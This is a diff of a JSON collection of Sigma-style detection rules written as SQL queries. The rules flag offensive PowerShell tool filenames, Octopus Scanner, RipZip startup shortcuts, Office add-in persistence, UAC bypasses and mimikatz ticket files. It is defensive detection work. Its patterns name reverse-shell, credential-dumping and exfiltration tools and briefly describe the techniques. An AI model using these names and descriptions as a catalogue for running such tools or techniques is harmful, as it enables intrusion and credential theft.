TargetFilename LIKE '%\\\\Gupt-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Login.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-ServiceBinary.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-SSP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ACLScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ADSBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-AmsiBypass.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ARPScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BackdoorLNK.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BadPotato.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BetterSafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BruteForce.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Carbuncle.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Certify.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ConPtyShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialsPhish.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DAFT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DCSync.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Decode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DinvokeKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DllInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DNSUpdate.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DowngradeAccount.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EgressCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Encode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EventViewer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Eyewitness.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-FakeLogonScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Invoke-Farmer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Get-RBCD-Threaded.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Gopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper2.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper3.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-HandleKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Interceptor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Internalmonologue.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-InveighRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRegsvr.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRundll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelayUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-LdapSignCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Lockless.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MalSCCM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MimikatzWDigestDowngrade.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikittenz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MITM6.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NanoDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetRipper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetworkRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NinjaCopy.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-OxidResolver.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshellx86.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Paranoia.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PortScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttp.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Invoke-PoshRatHttps.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PostExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellIcmp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTCP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLineBind.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerThIEf.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PPLDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Prasadhak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcatAgent.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PSInject.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsUaCme.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReflectivePEInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReverseDNSLookup.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Rubeus.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-RunAs.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SauronEye.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SCShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Seatbelt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ServiceAbuse.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SessionGopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ShellCode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SMBScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Snaffler.ps1' ESCAPE '\\' OR 
TargetFilename LIKE '%\\\\Invoke-Spoolsample.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSHCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSIDExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StandIn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StickyNotesExtract.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tater.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Thunderfox.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ThunderStruck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TokenManipulation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tokenvator.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TotalExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UrbanBishop.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UserHunter.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-VoiceTroll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Whisker.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WinEnum.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-winPEAS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WireTap.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WmiCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WScriptBypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Zerologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Keylogger.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\MailRaider.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\New-HoneyHash.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\OfficeMemScraper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Offline\\_Winpwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-CHM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-DnsTxt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Excel.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-HTA.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Java.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-JS.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Out-Minidump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-RundllCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCF.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Shortcut.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-WebQuery.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Word.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Parse\\_Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Port-Scan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerBreach.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powercat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Powermad.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerRunAsSystem.psm1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerSharpPack.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUpSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerView.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PSAsyncShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RemoteHashRetrieval.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-PoshRat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Update.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Run-EXEonRemote.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Schtasks-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-DCShadowPermissions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-MacAttribute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemotePSRemoting.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemoteWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-Wallpaper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Show-TargetScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Speak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-CaptureServer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-WebcamRecorder.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\StringToBase64.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TexttoExe.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VolumeShadowCopyTools.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinPwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSUSpendu.ps1' ESCAPE '\\') OR (TargetFilename LIKE '%Invoke-Sharp%' ESCAPE '\\' AND TargetFilename LIKE '%.ps1' ESCAPE '\\'))" ], - "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml" + "filename": "file_event_win_powershell_exploit_scripts.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - Security", - "id": "dcf2db1f-f091-425b-a821-c05875b8925a", - "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "title": "Octopus Scanner Malware", + "id": "805c55d9-31e6-4846-9878-c34c75054fe9", + "status": "test", + "description": "Detects Octopus Scanner Malware.", + "author": "NVISO", + "tags": [ + "attack.t1195", + "attack.t1195.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%\"set%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%/c%' ESCAPE '\\' OR ServiceFileName LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Cache134.dat' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\ExplorerSync.db' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_var_services_security.yml" + "filename": "file_event_win_mal_octopus_scanner.yml" }, { - "title": "Service Installed By Unusual Client - Security", - "id": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", + "title": "Potential RipZip Attack on Startup Folder", + "id": 
"a6976974-ea6f-4e97-818e-ea08625c52cb", "status": "experimental", - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "author": "Tim Rauch", + "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut.\nIf the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.\nAdditionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.\n", + "author": "Greg (rule)", "tags": [ - "attack.privilege_escalation", - "attack.t1543" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ClientProcessId = '0' OR ParentProcessId = '0'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\')" ], - "filename": "win_security_service_installation_by_unusal_client.yml" + "filename": "file_event_win_ripzip_attack.yml" }, { - "title": "SAM Registry Hive Handle Request", - "id": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", + "title": "Potential Persistence Via Microsoft Office Add-In", + "id": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", "status": "test", - "description": "Detects handles requested to SAM registry hive", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).", + "author": "NVISO", "tags": [ - "attack.discovery", - "attack.t1012", - "attack.credential_access", - 
"attack.t1552.002" + "attack.persistence", + "attack.t1137.006" ], "falsepositives": [ - "Unknown" + "Legitimate add-ins" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ObjectType = 'Key' AND ObjectName LIKE '%\\\\SAM' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.wll' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xll' ESCAPE '\\') OR (TargetFilename LIKE '%Microsoft\\\\Excel\\\\XLSTART\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xlam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Addins\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.xlam' ESCAPE '\\' OR TargetFilename LIKE '%.xla' ESCAPE '\\' OR TargetFilename LIKE '%.ppam' ESCAPE '\\')))" ], - "filename": "win_security_sam_registry_hive_handle_request.yml" + "filename": "file_event_win_office_addin_persistence.yml" }, { - "title": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security", - "id": "c39f0c81-7348-4965-ab27-2fde35a1b641", + "title": "UAC Bypass Using Windows Media Player - File", + "id": "68578b43-65df-4f81-9a9b-92f32711a951", "status": "test", - "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID 
= '5145' AND RelativeTargetName LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OskSupport.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\'))" ], - "filename": "win_security_dcom_iertutil_dll_hijack.yml" + "filename": "file_event_win_uac_bypass_wmp.yml" }, { - "title": "Kerberos Manipulation", - "id": "f7644214-0eb0-4ace-9455-331ec4c09253", - "status": "test", - "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", - "author": "Florian Roth (Nextron Systems)", + "title": "Office Template Creation", + "id": "0e20c89d-2264-44ae-8238-aeeaba609ece", + "status": "experimental", + "description": "Detects creation of template files for Microsoft Office from outside Office", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1212" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "Faulty legacy applications" + "Loading a user environment from a backup or a domain controller", + "Synchronization of templates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('675', '4768', '4769', '4771') AND FailureCode IN ('0x9', '0xA', '0xB', '0xF', '0x10', '0x11', '0x13', '0x14', '0x1A', '0x1F', '0x21', '0x22', '0x23', '0x24', '0x26', '0x27', '0x28', '0x29', '0x2C', '0x2D', '0x2E', '0x2F', '0x31', '0x32', '0x3E', '0x3F', '0x40', '0x41', '0x43', '0x44'))" + "SELECT * FROM logs WHERE ((((TargetFilename LIKE '%.dot' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.docx' 
ESCAPE '\\' OR TargetFilename LIKE '%.rtf' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup%' ESCAPE '\\') OR ((TargetFilename LIKE '%.xlt' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.xls' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\EXCEL.exe' ESCAPE '\\')))" ], - "filename": "win_security_susp_kerberos_manipulation.yml" + "filename": "file_event_win_word_template_creation.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - Security", - "id": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Mimikatz Kirbi File Creation", + "id": "9e099d99-44c2-42b6-a6d8-54c3545cab29", + "status": "test", + "description": "Detects the creation of files created by mimikatz such as \".kirbi\", \"mimilsa.log\", etc.", + "author": "Florian Roth (Nextron Systems), David ANDRE", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1558" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%mshta%' ESCAPE '\\' AND ServiceFileName LIKE '%vbscript:createobject%' ESCAPE '\\' AND ServiceFileName LIKE '%.run%' ESCAPE '\\' AND ServiceFileName LIKE '%window.close%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%.kirbi' ESCAPE '\\' OR TargetFilename LIKE '%mimilsa.log' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml" + "filename": 
"file_event_win_hktl_mimikatz_files.yml" }, { - "title": "PetitPotam Suspicious Kerberos TGT Request", - "id": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", + "title": "Legitimate Application Dropped Executable", + "id": "f0540f7e-2db3-4432-b9e0-3965486744bc", "status": "experimental", - "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", - "author": "Mauricio Velazco, Michael Haag", + "description": "Detects programs on a Windows system that should not write executables to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.credential_access", - "attack.t1187" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4768' AND TargetUserName LIKE '%$' ESCAPE '\\' AND CertThumbprint LIKE '%' ESCAPE '\\') AND NOT ((IpAddress = '::1') OR (CertThumbprint = '')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\'))" ], - "filename": "win_security_petitpotam_susp_tgt_request.yml" + "filename": "file_event_win_legitimate_app_dropping_exe.yml" }, { - "title": "Important Scheduled Task Deleted/Disabled", - "id": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", - "status": "experimental", - "description": "Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + 
"title": "UAC Bypass Abusing Winsat Path Parsing - File", + "id": "155dbf56-e0a4-4dd0-8905-8a98705045e8", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4699', '4701') AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\Schedule%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((EventID = '4699' AND SubjectUserName LIKE '%$' ESCAPE '\\' AND TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winmm.dll' ESCAPE '\\'))" ], - "filename": "win_security_susp_scheduled_task_delete_or_disable.yml" + "filename": "file_event_win_uac_bypass_winsat.yml" }, { - "title": "Remote PowerShell Sessions Network Connections (WinRM)", - "id": "13acf386-b8c6-4fe0-9a6e-c4756b974698", + "title": "Cred Dump Tools Dropped Files", + "id": "8fbf3271-1ef6-4e94-8210-03c2317947f6", "status": "test", - "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", - "author": "Roberto Rodriguez 
